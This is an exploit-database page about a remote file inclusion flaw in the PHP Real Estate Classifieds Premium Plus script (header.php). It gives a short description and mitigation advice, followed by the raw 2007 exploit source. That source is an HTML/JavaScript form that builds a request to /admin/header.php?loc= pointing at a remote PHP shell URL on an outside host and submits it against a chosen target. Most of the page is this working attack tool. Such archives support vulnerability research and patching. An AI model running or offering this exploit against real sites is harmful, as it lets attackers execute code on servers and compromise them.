header-logo
Suggest Exploit
vendor:
PHP Real Estate Classifieds Premium Plus
by:
http://notsec.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: PHP Real Estate Classifieds Premium Plus
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion Exploit

This is a remote file inclusion exploit in the PHP Real Estate Classifieds Premium Plus script. It allows an attacker to include arbitrary files from a remote server, potentially leading to remote code execution.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users should ensure that the script is up to date and implement proper input validation and sanitization.
Source

Exploit-DB raw data:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion 
Exploit</title>

<script language="JavaScript">

//===============================================================================================
//[Script Name: PHP Real Estate Classifieds Premium Plus
//[               not sec group
//[Author     : http://notsec.com
//[Email      : info@notsec.com
//===============================================================================================
//developers page:  http://phprealestatescript.com/

   var path="/admin/"
   var adres="header.php" 
   var acik ="?loc=" 
   var shell="http://notsec.com/shell.txt" // put THE php shell here

   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }



  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
  rfi.submit(); 
   }
</script>

</head>

<body bgcolor="white">
<center>

<p><b><font face="Arial" size="1" color="black">PHP Real Estate (header.php) Remote File Inclusion Exploit</font></b></p>

<p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
    <b><font face="verdana" size="1" color="black">Target:</font>
	<font face="verdana" size="1" color="black">[http://[vittima]/[path]</font><font color="black" size="2" face="Tahoma">
  </font><font color="white" size="1">&nbsp;</font></b>
  <input type="text" name="target1" size="10" style="background-color: white" onmouseover="javascript:this.style.background=\'white\';" onmouseout="javascript:this.style.background=\'white\';"></p>
  <p><input type="submit" value="submit" name="B1"><input type="reset" value="reset" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="400" width="650" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="verdana" size="1" color="gray"># notsec.com [08-06-2007]</font></b><p></b></p>
</p>
</center>
</body>

</html>

# milw0rm.com [2007-06-09]

Navigation

Suggest Exploit

Services By CQR